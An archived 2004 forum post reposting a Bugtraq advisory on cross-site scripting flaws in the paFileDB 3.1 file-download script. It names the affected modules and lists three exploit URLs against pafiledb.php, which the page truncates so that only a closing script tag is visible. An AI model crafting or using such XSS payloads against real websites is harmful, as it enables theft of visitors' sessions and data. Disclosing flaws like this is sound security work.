Help
-
Search
-
Member List
-
Calendar
Full Version:
New Xss Vulnerabilities In Pafiledb 3.1 Final
GovernmentSecurity.org
>
The Archives
>
Exploit Articles
qcred11
Sep 25 2004, 05:46 PM
QUOTE
Another XSS Vulnerability has been found in paFileDB!
paFileDB is designed to allow webmasters have a
database of files for download on their site.
Vulnerable:
Software: email & category & file paFileDB modules
Just Tested on: paFileDB 3.1 Final , but likely works
on another versions.
Exploit:
http://site/downloads/pafiledb.php?action=...</script>
http://site/downloads/pafiledb.php?action=...</script>
http://site/downloads/pafiledb.php?action=...</script>
Source:
http://seclists.org/lists/bugtraq/2004/Sep/0336.html
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here
.
Invision Power Board © 2001-2005
Invision Power Services, Inc.
